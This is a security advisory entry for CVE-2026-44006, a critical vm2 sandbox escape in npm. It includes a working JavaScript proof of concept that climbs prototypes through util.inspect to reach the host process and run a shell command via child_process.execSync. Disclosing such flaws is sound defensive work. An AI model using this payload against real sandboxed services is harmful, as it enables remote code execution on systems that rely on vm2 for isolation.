GHSA-qcp4-v2jj-fjx8
Suggest an improvement- Source
- https://github.com/advisories/GHSA-qcp4-v2jj-fjx8
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-qcp4-v2jj-fjx8/GHSA-qcp4-v2jj-fjx8.json
- JSON Data
- https://api.test.osv.dev/v1/vulns/GHSA-qcp4-v2jj-fjx8
- Aliases
-
- CVE-2026-44006
- Published
- 2026-05-07T03:54:34Z
- Modified
- 2026-05-07T04:03:45.867670Z
- Severity
-
- 10.0 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H CVSS Calculator
- Summary
- vm2 has a Sandbox Escape Vulnerability
- Details
-
Summary
It is possible to reach
BaseHandler.getPrototypeOf, which can be used to get arbitrary prototypesDetails
https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658
BaseHandlercan be reached viautil.inspect(same as https://github.com/patriksimek/vm2/commit/57971fa423abeb66f09e47e18102986549474ca8)PoC
let obj = { subarray: Buffer.prototype.inspect, slice: Buffer.prototype.slice, hexSlice: () => '', }; let sym; obj.slice(10, { showHidden: true, showProxy: true, depth: 10, stylize(a) { const handler = this.seen && this.seen[1]; if (handler && handler.getPrototypeOf) { gP = handler.getPrototypeOf; HObjectProto = gP(gP(gP(gP(Buffer)))); HObject = HObjectProto.constructor; sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0); } return a; }, }); obj = { [sym]: (depth, opt, inspect) => { inspect.constructor('return process')() .getBuiltinModule('child_process') .execSync('id', { stdio: 'inherit' }); }, valueOf: undefined, constructor: undefined, }; WebAssembly.compileStreaming(obj).catch(() => {});Impact
Sandbox Escape -> RCE
- Database specific
{ "github_reviewed": true, "severity": "CRITICAL", "nvd_published_at": null, "cwe_ids": [ "CWE-94" ], "github_reviewed_at": "2026-05-07T03:54:34Z" }- References
Affected packages
npm / vm2
Package
- Name
- vm2
- View open source insights on deps.dev
- Purl
- pkg:npm/vm2